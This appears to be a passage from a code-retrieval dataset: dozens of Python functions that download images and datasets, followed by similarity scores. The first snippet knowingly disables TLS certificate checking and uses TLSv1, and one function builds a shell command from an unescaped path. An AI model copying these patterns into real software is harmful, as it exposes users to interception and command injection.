% (full_name, url) )\n # When calling the SSLContext constructor directly, CERT_NONE is the default.\n # Since it does not authenticate the other peer it can be insecure\n # Beyond the scope of this exercise (emoji holding my nose)\n unsecure_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\n with urllib.request.urlopen(url, context=unsecure_context) as response, open(full_name, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n img_ctr += 1\n return image_names", "def my_download_pic(name, url, date_epoch, outputlabel=None, quiet=False):\n if outputlabel is None:\n outputlabel = instaloader._epoch_to_string(date_epoch)\n urlmatch = re.search('\\\\.[a-z]*\\\\?', url)\n file_extension = url[-3:] if urlmatch is None else urlmatch.group(0)[1:-1]\n filename = name.lower() + '/' + instaloader._epoch_to_string(date_epoch) + '.' 
+ file_extension\n if os.path.isfile(filename):\n instaloader._log(outputlabel + ' exists.', flush=True, quiet=quiet)\n raise PicAlreadyDownloadedException(\"File \\'\" + filename + \"\\' already exists.\")\n resp = instaloader.get_anonymous_session().get(url, stream=True)\n if resp.status_code == 200:\n instaloader._log(outputlabel + ' uploaded.', flush=True, quiet=quiet)\n os.makedirs(name.lower(), exist_ok=True)\n with open(filename, 'wb') as file:\n resp.raw.decode_content = True\n shutil.copyfileobj(resp.raw, file)\n os.utime(filename, (datetime.datetime.now().timestamp(), date_epoch))\n return filename\n else:\n raise instaloader.ConnectionException(\"File \\'\" + url + \"\\' could not be downloaded.\")", "def _download_images(self, url_file, destination_dir, log_file):\n logger = self.setup_log(log_file)\n logger.info(config.LOG_INITIAL_MESSAGE % (url_file, destination_dir))\n\n with open(url_file) as urls:\n for i, l in enumerate(urls):\n pass\n bar = progressbar.ProgressBar(i + 1)\n\n download_count = 0\n\n # opening the url file and reading the urls\n with open(url_file, 'r') as urls:\n for i, url in enumerate(urls):\n bar.set(i)\n\n url = url.strip()\n components = urllib.parse.urlparse(url)\n if not (components.scheme and components.netloc and components.path):\n logger.error('%s: \"%s\"' % (config.LOG_URL_INVALID, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # check whether the robots.txt allows us to crawl this URL\n try:\n can_fetch = self.download_allowed(url, components.scheme, components.netloc)\n except (AttributeError, urllib.error.URLError, ValueError):\n logger.error('%s: %s' % (config.LOG_ERROR_ROBOTS, self.truncate_middle(url, config.MAX_URL)))\n continue\n\n # log that image download is disallowed\n if not can_fetch:\n logger.error('%s: %s' % (config.LOG_DISALLOWED, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # open image url\n try:\n url_response = urllib.request.urlopen(url)\n except urllib.error.URLError as error:\n logger.error('%s: %s' % (config.LOG_ERROR_OPENING, self.truncate_middle(url, config.MAX_URL)))\n continue\n\n # check whether the URL content is an image \n if url_response.info().get_content_maintype().lower() != config.IMAGE_MIMETYPE:\n logger.error('%s: %s' % (config.LOG_NOT_AN_IMAGE, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # retrieve the content and store in the destination directory\n os.makedirs(destination_dir, exist_ok=True) \n image_name = '%s_%s' % (download_count + 1, os.path.basename(url))\n with open(os.path.join(destination_dir, image_name), 'wb') as image_file:\n try:\n image_file.write(url_response.read())\n except urllib.error.URLError as error:\n logger.error('%s: %s' % (config.LOG_ERROR_DOWNLOADING, self.truncate_middle(url, config.MAX_URL)))\n continue\n \n # log download and increment the counter\n logger.info('%s %s, url: %s' % (config.LOG_DOWNLOADED, self.truncate_middle(image_name, config.MAX_FILE_NAME), self.truncate_middle(url, config.MAX_URL)))\n download_count += 1\n\n # set the progress bar to 100 percent and print a comment and new line for the returning prompt\n bar.complete('completed')\n\n # release the logger handles\n self.shutdown_log(logger)", "async def download_all_images(main_page):\n all_relevant_pages = [f'https://{main_page}']\n async with aiohttp.ClientSession() as session:\n subpages = await get_all_relevant_subpages(session, main_page)\n all_relevant_pages.extend(subpages)\n\n await scrape_pages(session, all_relevant_pages)\n\n logging.info('Images from 
main page %s and its sub pages were download', main_page)", "def get_images(eol_id):\n page = 1\n while True:\n details_url = f\"https://eol.org/api/pages/1.0/{eol_id}.json\"\n payload = {\"id\": eol_id, \n \"images_per_page\": 75,\n \"images_page\": page,\n }\n r = requests.get(details_url, params=payload)\n\n response = json.loads(r.text)\n content = response[\"taxonConcept\"]\n if not \"dataObjects\" in content:\n return\n\n for item in content[\"dataObjects\"]:\n yield item[\"mediaURL\"]\n page += 1", "def getData(constrain):\n\n dat_AGS = chunks(AGS, 100)\n for num, ags_c in enumerate(dat_AGS):\n to_download = DOWNLOAD_LINK.format(ags_id=ags_c, constrain=constrain)\n to_download = to_download.replace(\" \", \"\")\n download_name = \"../Data/Gemeinden/{}-{}.csv\".format(\n constrain, num)\n\n url.urlretrieve(to_download, filename=download_name)\n\n sleep(1) # be nice\n\n return(num)", "def get_tile(url):\n hash_name = hashlib.md5(url.encode(\"utf-16\")).hexdigest()\n fname = hash_name + \".jpeg\"\n print(\"Checking tile\" + fname)\n #if image is already downloaded, return it\n if os.path.isfile(fname):\n print(\"Downloaded!\")\n try:\n # image was fully downloaded, good to return\n return Image.open(fname) \n except Exception:\n print(\"Tile is corrupt :(\")\n # file is corrupted for some reason, so try to download it\n pass\n print(\"Downloading \" + fname)\n req.urlretrieve(url, fname) \n return Image.open(fname)", "def download_image(img_src, to_filename):\n res = requests.get(urljoin(BASE_URL, img_src), stream=True)\n with open(to_filename, \"wb\") as f:\n for chunk in res:\n f.write(chunk)", "def extract_image(page_html, family_url, folder):\n image_extractor = Extractor(page_html, family_url)\n for url in image_extractor.get_image_table():\n image_page_url = urljoin(family_url, url)\n # print(image_page_url)\n imres = requests.get(image_page_url)\n image_page_extractor = Extractor(imres.text, image_page_url)\n image_src, image_name = image_page_extractor.get_image_link()\n\n image_link = urljoin(image_page_url, image_src)\n\n print(image_link, image_name)\n # Download image\n fetch(image_link, image_name, folder)", "def fetch(self, page, part):\n\n file = '/page-' + str(page)\n if part > 1:\n file += '.' 
+ str(part)\n file += '.png'\n\n source = self.baseUrl + file\n destination = self.download\n\n no_problem_unlink(destination + '-small')\n no_problem_unlink(destination)\n\n image = http_get(source)\n if image.find('Not Found') == -1 and len(image) > 0:\n f = open(destination + '-small', 'w')\n f.write(image)\n f.close()\n\n if os.path.exists(destination + '-small') and os.path.getsize(destination + '-small') > 0:\n width = self.ORIGINAL_WIDTH * self.RESIZE_FACTOR\n height = self.ORIGINAL_HEIGHT * self.RESIZE_FACTOR\n resize_png(width, height, destination + '-small', destination)\n return destination\n else:\n return self.default", "def download_images(img_urls, dest_dir, base_url=\"http://code.google.com\"):\n create_dir(dest_dir)\n img_tags = fetch_call(img_urls, dest_dir)\n create_html(dest_dir, img_tags)", "def __urlImageGenerator(cls, link):\n\n try:\n a = Article(url=link)\n a.download()\n a.parse()\n a.fetch_images()\n\n for img in a.imgs:\n yield img\n except Exception:\n pass", "def get_image():\n\n url = 'http://skyview.gsfc.nasa.gov/cgi-bin/images'\n params = dict(Position='%s,%s' % (source['ra'], source['dec']),\n Survey=source['survey'].val,\n Return='GIF')\n response = requests.get(url, params=params, stream=True)\n with open(files['image.gif'].rel, 'wb') as out_file:\n shutil.copyfileobj(response.raw, out_file)", "def GET(self, url):\n try:\n f = open(url, 'r')\n image = f.read()\n f.close()\n except:\n\n db_module.resave_img(url[5:])\n\n f = open(url, 'r')\n image = f.read()\n f.close()\n\n return image", "def test_z_download_images(self):\n #img_urls = logpuzzle.read_urls('place_code.google.com')\n img_urls = logpuzzle.read_urls('animal_code.google.com')\n dest_dir = './puzzle_images'\n logpuzzle.download_images(img_urls, dest_dir)\n\n result = os.listdir(dest_dir)\n expected_result = ['img0.jpg', 'img1.jpg', 'img10.jpg', 'img11.jpg', 'img12.jpg', 'img13.jpg', 'img14.jpg', 'img15.jpg', 'img16.jpg', 'img17.jpg', 'img18.jpg', 'img19.jpg', 'img2.jpg', 'img3.jpg', 'img4.jpg', 'img5.jpg', 'img6.jpg', 'img7.jpg', 'img8.jpg', 'img9.jpg']\n self.assertEqual(expected_result, result,\n 'write_index_file() expected {} but got {}'.format(expected_result, result))", "def save_image(self, url_and_filename: List[str]) -> None:\n\n res_jpg = requests.get(url_and_filename[0])\n res_jpg.raise_for_status()\n os.makedirs(os.path.join(THIS_DIR, 'comics'), exist_ok=True)\n open(os.path.join(THIS_DIR, f'comics/{url_and_filename[1]}'), \"wb\").write(res_jpg.content)", "def download():\n \"\"\"\n \"The book p.79 have error.\n \"https://github.com/login/oauth/authorize?client_id=7e0a3cd836d3e544dbd9&redirect_uri=https%3A%2F%2Fgist.github.com%2Fauth%2Fgithub%2Fcallback%3Freturn_to%3Dhttps%253A%252F%252Fgist.github.com%252Fyoungsoul%252Ffc69665c5d08e189c57c0db0e93017a6&response_type=code&state=9b385430ee7cd1a75ca91c1d1cb6c565111f6b81e54a71f42ae9b22035241b9b\n \"\"\"\n subprocess.call([\n 'wget',\n 'https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat', \n '-P',\n 'origin_data/'\n ])\n logger.info('Download success!')", "def download_image(year, month, day, hour, minute):\n\n image_address = f\"https://www.berner-storch.ch/webcam/upload/cam01/{year}/{str(month).zfill(2)}/{str(day).zfill(2)}/{str(hour).zfill(2)}/cam-{str(minute).zfill(2)}.jpg\"\n\n # this will be the filename \"YYYY-MM-DD_HH-MM\"\n date = f\"{year}-{str(month).zfill(2)}-{str(day).zfill(2)}_{str(hour).zfill(2)}-{str(minute).zfill(2)}\"\n\n try:\n urllib.request.urlretrieve(image_address, 
f\"../images/{year}/{date}.jpg\")\n except:\n print(f\"image under the link {image_address} can't be retrieved\")", "def download_image(save_dir, imgInfoPool, timeout=10, replaceExist=False):\n os.chdir(save_dir)\n\n cnt = 0\n for imgInfo in imgInfoPool:\n filename = str(imgInfo['id']) + '.' + imgInfo['url'].split('.')[-1]\n if not replaceExist and os.path.exists(filename):\n print('Skip exist image ' + filename)\n continue\n else:\n print('Downloading...' + str(cnt) + '/' + str(len(imgInfoPool)), end='\\r')\n\n try:\n r = requests.get(imgInfo['url'], headers={'Referer': imgInfo['pageurl']}, timeout=timeout)\n except ConnectionError:\n print('I cannot download the page...')\n print('url: ', imgInfo['url'])\n except TimeoutError:\n print('Network timeout. Please try again.')\n print('url: ', imgInfo['url'])\n else:\n try:\n with open(filename, 'wb') as f:\n f.write(r.content)\n except IOError:\n print('Cannot write picture ' + imgInfo['id'])\n return 1\n cnt += 1", "def download_images(self, url_file, destination_dir, log_file):\n try:\n self._download_images(url_file, destination_dir, log_file)\n except IOError as error:\n sys.stderr.write(str(error))\n sys.exit(error.errno)\n except Exception as error:\n sys.stderr.write('[Unknown error] %s' % str(error))\n sys.exit(1)", "def download_many(archivos:[(\"url\",\"nombre\")], carpeta:str=PATH, *, ignore_error:bool=True, _gui:bool=False, **tqdm_karg):", "def download_image(wnid, query):\r\n images = urllib2.urlopen(image_url+wnid)\r\n images_list = [image.split() for image in images]\r\n random.shuffle(images_list)\r\n \r\n## urllib.urlretrieve(bbox_url+wnid+\".tar.gz\",wnid+\".tar.gz\")\r\n print(bbox_url+wnid)\r\n## urllib.urlretrieve(bbox_url+wnid,wnid+\".tar.gz\")\r\n retrieve(bbox_url+wnid+\".tar.gz\", wnid+\".tar.gz\")\r\n bb_files = tarfile.open(wnid+\".tar.gz\", \"r:gz\")\r\n names = bb_files.getnames()\r\n \r\n names = \"\".join(names)\r\n ids = re.findall(pattern, names)\r\n used_id = None\r\n \r\n for image in images_list:\r\n if re.findall(pattern,image[0])[0] in ids:\r\n try:\r\n url = urllib2.urlopen(image[1]).geturl()\r\n if url == image[1]:\r\n used_id = image[0]+\".xml\"\r\n## urllib.urlretrieve(url,\"usable\"+query+\".jpg\")\r\n retrieve(url, \"usable\"+query+\".jpg\")\r\n break\r\n except:\r\n continue\r\n \r\n for member in bb_files:\r\n if used_id in member.name:\r\n bbox = bb_files.extractfile(member)\r\n bbox_file = open(\"usable\"+query+\".xml\",\"w\")\r\n bbox_file.write(bbox.read())\r\n bbox_file.close()\r\n break\r\n \r\n bb_files.close()", "def main():\n try:\n pixid = sys.argv[1]\n except IndexError:\n print('Usage: python pixget.py [pixid] (save_path)')\n exit(1)\n\n # get the path\n if len(sys.argv) > 2:\n path = sys.argv[2]\n else:\n path = '.'\n\n imgInfoPool = []\n if get_image_url(pixid, imgInfoPool):\n exit(1)\n download_image(path, imgInfoPool)", "def download_image(image_url, image_name, collection_id):\n try:\n response = requests.get(image_url)\n folder_path = imgs_directory + '/' + collection_id\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n image_path = folder_path + '/' + image_name\n # image_path = os.path.join(folder_path, image_name)\n with open(image_path, 'wb') as f:\n f.write(response.content)\n return image_path\n except Exception as e:\n print(f\"An error occurred while downloading image {image_name}. 
Error message: {e}\")\n return None", "def download_picture(inPath):\n success = False\n consoleFeedback = exec_console_command(constants.copyFileToStatic.format(inPath))\n print(consoleFeedback)\n\n if \"SUCCESS\" in consoleFeedback:\n success = True\n else:\n raise IOError(constants.pictureNotFound)\n\n return success", "def image_fetcher(year, month, day, name):\n entry = 'data/{year}/{month}/{day}/{name}'.format(year=year, month=month, day=day, type=type, name=name)\n img = open(entry)\n return send_file(img)", "def download_image(filename):\n return ImageApiHandler.image_handler.get(filename)", "def download_image(self, url):\r\n file_path = os.path.join(self.temp_dir, 'image.png')\r\n urlretrieve(url, file_path)\r\n return file_path", "def get_image_url():", "def auto_download(self, dataDir, dataType, dataYear):\n\n # Setup paths and file names\n if dataType == \"minival\" or dataType == \"valminusminival\":\n imgDir = \"{}/{}{}\".format(dataDir, \"val\", dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, \"val\", dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(\"val\", dataYear)\n else:\n imgDir = \"{}/{}{}\".format(dataDir, dataType, dataYear)\n imgZipFile = \"{}/{}{}.zip\".format(dataDir, dataType, dataYear)\n imgURL = \"http://images.cocodataset.org/zips/{}{}.zip\".format(dataType, dataYear)\n # print(\"Image paths:\"); print(imgDir); print(imgZipFile); print(imgURL)\n\n # Create main folder if it doesn't exist yet\n if not os.path.exists(dataDir):\n os.makedirs(dataDir)\n\n # Download images if not available locally\n if not os.path.exists(imgDir):\n os.makedirs(imgDir)\n print(\"Downloading images to \" + imgZipFile + \" ...\")\n with urllib.request.urlopen(imgURL) as resp, open(imgZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... done downloading.\")\n print(\"Unzipping \" + imgZipFile)\n with zipfile.ZipFile(imgZipFile, \"r\") as zip_ref:\n zip_ref.extractall(dataDir)\n print(\"... done unzipping\")\n print(\"Will use images in \" + imgDir)\n\n # Setup annotations data paths\n annDir = \"{}/annotations\".format(dataDir)\n if dataType == \"minival\":\n annZipFile = \"{}/instances_minival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_minival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/o43o90bna78omob/instances_minival2014.json.zip?dl=0\"\n unZipDir = annDir\n elif dataType == \"valminusminival\":\n annZipFile = \"{}/instances_valminusminival2014.json.zip\".format(dataDir)\n annFile = \"{}/instances_valminusminival2014.json\".format(annDir)\n annURL = \"https://dl.dropboxusercontent.com/s/s3tw5zcg7395368/instances_valminusminival2014.json.zip?dl=0\"\n unZipDir = annDir\n else:\n annZipFile = \"{}/annotations_trainval{}.zip\".format(dataDir, dataYear)\n annFile = \"{}/instances_{}{}.json\".format(annDir, dataType, dataYear)\n annURL = \"http://images.cocodataset.org/annotations/annotations_trainval{}.zip\".format(dataYear)\n unZipDir = dataDir\n # print(\"Annotations paths:\"); print(annDir); print(annFile); print(annZipFile); print(annURL)\n\n # Download annotations if not available locally\n if not os.path.exists(annDir):\n os.makedirs(annDir)\n if not os.path.exists(annFile):\n if not os.path.exists(annZipFile):\n print(\"Downloading zipped annotations to \" + annZipFile + \" ...\")\n with urllib.request.urlopen(annURL) as resp, open(annZipFile, 'wb') as out:\n shutil.copyfileobj(resp, out)\n print(\"... 
done downloading.\")\n print(\"Unzipping \" + annZipFile)\n with zipfile.ZipFile(annZipFile, \"r\") as zip_ref:\n zip_ref.extractall(unZipDir)\n print(\"... done unzipping\")\n print(\"Will use annotations in \" + annFile)", "def download(correlation_id, image_url, output_path=None):\n try:\n response = requests.get(image_url, timeout=15)\n if response.ok:\n if not output_path:\n output_path = os.path.join(TMP_FOLDER, '{}.png'.format(correlation_id))\n with open(output_path, 'wb') as f:\n f.write(response.content)\n except Exception as e:\n log.warn('Error downloading [{}]: [{}]'.format(image_url, e))\n output_path = None\n return output_path", "def get_images(self):\n # test\n for it in self.xml.iterfind('image'):\n print(it)\n\n elements = []\n els = self.xml.findall('image')\n for el in els:\n elements.push(el.find('src')[0])\n els = self.xml.findall('full_picture')\n elements = elements + els\n self.__download_(elements)", "def download_image(filename, url):\n if not url:\n return url\n refresh_needed = False\n if xbmcvfs.exists(filename) and filename == url:\n # only overwrite if new image is different\n return filename\n else:\n if xbmcvfs.exists(filename):\n xbmcvfs.delete(filename)\n refresh_needed = True\n if xbmcvfs.copy(url, filename):\n if refresh_needed:\n refresh_image(filename)\n return filename\n\n return url", "def download_mnist (data='training'):\n assert data in ['training', 'testing']\n \n if data == 'training':\n images_url = 'http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz'\n labels_url = 'http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz'\n else:\n images_url = 'http://yann.lecun.com/exdb/mnist/t10k-images-idx3-ubyte.gz'\n labels_url = 'http://yann.lecun.com/exdb/mnist/t10k-labels-idx1-ubyte.gz'\n \n (images_fn_gz, _) = urllib.urlretrieve ('http://yann.lecun.com/exdb/mnist/train-images-idx3-ubyte.gz')\n (labels_fn_gz, _) = urllib.urlretrieve ('http://yann.lecun.com/exdb/mnist/train-labels-idx1-ubyte.gz')\n return (images_fn_gz, labels_fn_gz)", "def download_images(self, im_format: str):\n rows = self.tbl_images.get_selected_rows()\n ids = []\n names = []\n for r in rows:\n ids.append(self.tbl_images.item(r, 0).text())\n names.append(self.tbl_images.item(r, 1).text())\n\n if len(ids) == 1:\n\n # Create File Save Dialog\n dialog = QFileDialog(parent=self, caption='Save As..')\n\n dialog.setMimeTypeFilters([\"image/\"+im_format.lower()])\n dialog.setFileMode(QFileDialog.AnyFile)\n\n if dialog.exec_() == QDialog.Accepted:\n filename = dialog.selectedFiles()[0]\n ret = api.get_download_images(ids, im_format, self.user_hash)\n if ret.get('success') is False:\n self.show_error(ret['error_msg'])\n else:\n image_b = b64s_to_b(ret['data'])\n with open(filename, 'wb+') as f:\n f.write(image_b)\n\n elif len(ids) >= 1:\n\n # Create File Save Dialog\n dialog = QFileDialog(parent=self, caption='222Save As..')\n dialog.setMimeTypeFilters(['application/zip'])\n dialog.setFileMode(QFileDialog.AnyFile)\n\n if dialog.exec_() == QDialog.Accepted:\n filename = dialog.selectedFiles()[0]\n ret = api.get_download_images(ids, im_format, self.user_hash)\n if ret.get('success') is False:\n self.show_error(ret['error_msg'])\n else:\n image_b = b64s_to_b(ret['data'])\n with open(filename, 'wb+') as f:\n f.write(image_b)\n else:\n return", "def get_img_from_url(index, url):\n try:\n with urllib.request.urlopen(url) as response:\n if response.headers.get_content_maintype() == 'image':\n image_filename = image_filename_prefix.format(name=image_class_name,\n counter=index,\n 
ext=response.headers.get_content_subtype())\n image_filepath = os.path.join(target_folder, image_filename)\n with open(image_filepath, 'wb') as image_file:\n image_file.write(response.read())\n\n print('Fetched URL {}'.format(index))\n\n except urllib.request.HTTPError:\n pass\n except Exception:\n pass", "def download_image_urls(\n urls_filename: Union[Path, str],\n synsets: List[str],\n max_concurrent: int = 50,\n rewrite: bool = False\n) -> Dict[str, Optional[List[str]]]:\n print(\"Downloading image urls.\")\n synsets_to_urls = asyncio.run(_download_image_urls(urls_filename, synsets, max_concurrent, rewrite))\n return synsets_to_urls", "def download_coco(): \n file_type = '.zip'\n img_to_download = ['val','test','train']\n ann_to_download = ['annotations_trainval','image_info_test']\n base_url_images = 'http://images.cocodataset.org/zips/'\n base_url_ann = 'http://images.cocodataset.org/annotations/'\n\n\n click.echo(click.style(f\"\\n DOWNLOAD ANNOTATIONS \\n\", bg='green', bold=True, fg='white'))\n for ann in ann_to_download:\n\n ## build Urls\n ann_url = base_url_ann + ann + str(cfg.COCO_YEARS) + file_type\n \n click.echo(click.style(f'\\nDownloading of {ann} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{ann} will be downloaded')\n\n zip_filename_location = save_zip_from_url(ann_url,cfg.PATH_ANNOTATIONS)\n #zip_filename_location = \"/home/kamgo-gpu/Schreibtisch/stuff_annotations_trainval2017.zip\"\n click.echo(f\"the downloaded zip file was saved in to {zip_filename_location}\")\n\n click.echo(click.style(f'\\n Extraction of {ann} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{ann} will be extracted and the zip-file will be deleted')\n\n # Extract zip to annotation directory\n Extract_zip_file(zip_filename_location,cfg.PATH_ANNOTATIONS)\n\n click.echo(click.style(f\"\\n DOWNLOAD IMAGES \\n\", bg='green', bold=True, fg='white'))\n for dataset in img_to_download:\n ## build Urls\n dataset_img_url = base_url_images + dataset + str(cfg.COCO_YEARS) + file_type\n \n click.echo(click.style(f'\\n Downloading of {dataset} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{dataset} will be downloaded')\n\n zip_filename_location = save_zip_from_url(dataset_img_url,cfg.PATH_IMAGES)\n click.echo(f\"the downloaded zip file was saved in to {zip_filename_location}\")\n click.echo(click.style(f'\\n Extraction of {dataset} ...\\n', bg='blue', bold=True, fg='white'))\n click.echo(f'{dataset} will be extracted and the zip-File will be deleted')\n\n # set complet Path to save images\n Extract_zip_file(zip_filename_location,cfg.PATH_IMAGES)\n\n click.echo(click.style(f'\\n Download and extraction termined successfull {dataset} ...\\n', bg='green', bold=True, fg='white'))", "def download():\n raise NotImplementedError", "def make_request(api: IsicApi, image_set: list, params: DownloadCommandParameters) -> Union[List[dict], None]:\n # Convert to a json array\n url_image_ids = json.dumps(str(image_set))\n\n # Replace and switch quote notation for the API\n url_image_ids = url_image_ids.replace('\"', \"\")\n url_image_ids = url_image_ids.replace(\"'\", '\"')\n # Quote all url strings.\n url_image_ids = urllib.parse.quote(url_image_ids)\n # Create the endpoint URL\n endpoint = f\"image/download?include={params.include}&imageIds={url_image_ids}\"\n\n # Request the images and return the response\n return api.get(endpoint=endpoint, timeout=params.timeout)" ]
[ "0.66714674", "0.6665392", "0.662957", "0.65895194", "0.6587865", "0.6502355", "0.64724034", "0.64450634", "0.64316654", "0.6391709", "0.6382724", "0.6302078", "0.6292136", "0.6259905", "0.6259636", "0.6252637", "0.6219414", "0.6212664", "0.61892736", "0.61513776", "0.6140734", "0.6130097", "0.61186403", "0.61059463", "0.60937715", "0.60852975", "0.6082696", "0.60770524", "0.6076696", "0.6074698", "0.60599357", "0.60217124", "0.6017428", "0.60118985", "0.60002387", "0.59866005", "0.5978882", "0.59767026", "0.5962165", "0.59571236", "0.59329945", "0.592053", "0.5920478", "0.5919601", "0.591461", "0.59138435", "0.5904527", "0.58841175", "0.5874268", "0.58701175", "0.5842259", "0.5835956", "0.58274394", "0.5826139", "0.5820414", "0.5800625", "0.57987154", "0.5796462", "0.5794441", "0.5778131", "0.5768174", "0.57647574", "0.57375836", "0.57352346", "0.57315505", "0.5730508", "0.5723643", "0.5721905", "0.5714879", "0.57137394", "0.571118", "0.5709375", "0.57090086", "0.5701457", "0.56909835", "0.56894076", "0.56885594", "0.5687672", "0.56865996", "0.56815106", "0.5674733", "0.567155", "0.56711656", "0.56429815", "0.5641784", "0.5636759", "0.56311226", "0.5630112", "0.56167525", "0.5611035", "0.5605663", "0.56035334", "0.560033", "0.55979204", "0.558997", "0.5588969", "0.5577205", "0.5573583", "0.5558204", "0.555792" ]
0.6981115
0
r""" Calculate drainage curve based on the image produced by the ``porosimetry`` function. Returns
def get_drainage_data(self):
    im = self.result
    sizes = sp.unique(im)
    R = []
    Snwp = []
    Vp = sp.sum(im > 0)
    for r in sizes[1:]:
        R.append(r)
        Snwp.append(sp.sum(im >= r))
    Snwp = [s/Vp for s in Snwp]
    data = namedtuple('xy_data', ('radius', 'saturation'))
    return data(R, Snwp)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_drainage_efficiency(self):#, PLOT, FIGURE, DISTRIBUTION):\n\n print ' Reading drainage efficiency'\n\n self.drainage_efficiency = {}\n\n drainage = np.zeros(self.ATTM_nrows * self.ATTM_ncols)\n\n for i in range(0, self.ATTM_nrows * self.ATTM_ncols):\n if self.ATTM_Total_Fractional_Area[i] > 0.0 :\n if self.Terrestrial['Drainage_Efficiency_Distribution'].lower() == 'random':\n chance = random.random()\n if chance > self.Terrestrial['Drainage_Efficiency_Random_Value']:\n self.drainage_efficiency[i] = 'above'\n drainage[i] = 1.\n else:\n self.drainage_efficiency[i] = 'below'\n drainage[i] = 2. # redundant, but explicit\n elif self.Terrestrial['Drainage_Efficiency_Distribution'].lower() == 'above':\n self.drainage_efficiency[i] = 'above'\n drainage[i] = 1.\n elif self.Terrestrial['Drainage_Efficiency_Distribution'].lower() == 'below':\n self.drainage_efficiency[i] = 'below'\n drainage[i] = 2.\n else: \n self.drainage_efficiency[i] = 'none'\n drainage[i] =0.\n\n print ' done.'\n print ' '\n\n # ==================================================\n # Create desired output files, figures, and plots\n # ==================================================\n if self.Terrestrial['Drainage_Efficiency_Figure'].lower() == 'yes':\n # -------------------------\n # Move to output directory\n # -------------------------\n if self.Simulation_area.lower() == 'barrow':\n os.chdir(self.control['Run_dir']+self.Output_directory+'/Barrow')\n\n # -----------------------\n # Create desired output\n # -----------------------\n drainage = np.reshape(drainage, [self.ATTM_nrows, self.ATTM_ncols])\n\n fig = pl.figure()\n pl.imshow(drainage, interpolation='nearest', cmap='bone')\n pl.colorbar( extend = 'max', shrink = 0.92)\n pl.title('Drainage efficiency')\n pl.savefig('./Initialization/Drainage_efficiency.png', format = 'png')\n drainage.tofile('./Initialization/Drainage_efficiency.bin')\n pl.close()\n\n os.chdir(self.control['Run_dir'])", "def pois_metric(pipe_diameter, delta_p, pipe_length):\n mu = 0.001 # water @ 25 degrees C\n pois = mu * 10\n flow_rate_lam = (math.pi * (pipe_diameter ** 4) * delta_p) / (128 * pois * pipe_length)\n\n return flow_rate_lam", "def prada(self):\n scale_factor = 1.0 / (1.0 + self.snapshot.header.redshift)\n r200c_physical = self.r200c * scale_factor / 1000.0 # units Mpc\n\n v200 = (\n (self.snapshot.const.G * self.m200c)\n / r200c_physical\n * self.snapshot.const.Mpc ** 2\n / 1000.0 ** 2\n ) ** 0.5 # units km/s\n\n def y(x, vmax, v200):\n func = np.log(1 + x) - (x / (1 + x))\n return ((0.216 * x) / func) ** 0.5 - (vmax / v200)\n\n concentration = np.zeros((len(self.vmax)))\n for halo in range(self.N_halos):\n if v200[halo] > self.vmax[halo]:\n concentration[halo] = -9999.0\n else:\n try:\n concentration[halo] = newton(\n y, x0=5.0, args=(self.vmax[halo], v200[halo])\n )\n except:\n concentration[halo] = -9999.0\n\n return concentration", "def priceit(self):\n paytree = np.zeros((self.steps+1,self.steps+1))\n paytree[-1,:] = np.array( list( map(lambda x:max(x-self.s,0.0),self.pricetree[-1,:]) ) )\n discount = math.exp( self.r*self.deltatime )\n for i in range(self.steps,0,-1):\n for j in range(i):\n paytree[i-1][j] = (paytree[i][j]*self.upprob +paytree[i][j+1]*(1-self.upprob))/discount\n return paytree[0][0]", "def bern_metric(pipe_diameter, delta_p, pipe_length):\n fr_c = 0.003 # assuming Reynolds number is 10**5 and pipe material is smooth copper\n fr_reyn = 0.046 / (reynolds_num(pipe_diameter, delta_p, pipe_length) ** 0.2) # Taitel and Dukler approximation\n rho = 1000 # 
density of water @ 4 deg celsius (kg/m**3)\n\n v = math.sqrt((2 * delta_p) / (rho * (4 * fr_reyn * (pipe_length / pipe_diameter) - 1)))\n flow_rate_turb = v * ((math.pi / 4) * (pipe_diameter ** 2))\n\n return flow_rate_turb, v", "def calc_rsi(image):\n\n # roll axes to conventional row,col,depth\n img = np.rollaxis(image, 0, 3)\n\n # bands: Coastal(0), Blue(1), Green(2), Yellow(3), Red(4), Red-edge(5), NIR1(6), NIR2(7)) Multispectral\n COAST = img[:, :, 0]\n B = img[:, :, 1]\n G = img[:, :, 2]\n Y = img[:, :, 3]\n R = img[:, :, 4]\n RE = img[:, :, 5]\n NIR1 = img[:, :, 6]\n NIR2 = img[:, :, 7]\n\n arvi = old_div((NIR1 - (R - (B - R))), (NIR1 + (R - (B - R))))\n dd = (2 * NIR1 - R) - (G - B)\n gi2 = (B * -0.2848 + G * -0.2434 + R * -0.5436 + NIR1 * 0.7243 + NIR2 * 0.0840) * 5\n gndvi = old_div((NIR1 - G), (NIR1 + G))\n ndre = old_div((NIR1 - RE), (NIR1 + RE))\n ndvi = old_div((NIR1 - R), (NIR1 + R))\n ndvi35 = old_div((G - R), (G + R))\n ndvi84 = old_div((NIR2 - Y), (NIR2 + Y))\n nirry = old_div((NIR1), (R + Y))\n normnir = old_div(NIR1, (NIR1 + R + G))\n psri = old_div((R - B), RE)\n rey = old_div((RE - Y), (RE + Y))\n rvi = old_div(NIR1, R)\n sa = old_div(((Y + R) * 0.35), 2) + old_div((0.7 * (NIR1 + NIR2)), 2) - 0.69\n vi1 = old_div((10000 * NIR1), (RE) ** 2)\n vire = old_div(NIR1, RE)\n br = (old_div(R, B)) * (old_div(G, B)) * (old_div(RE, B)) * (old_div(NIR1, B))\n gr = old_div(G, R)\n rr = (old_div(NIR1, R)) * (old_div(G, R)) * (old_div(NIR1, RE))\n\n ###Built-Up indices\n wvbi = 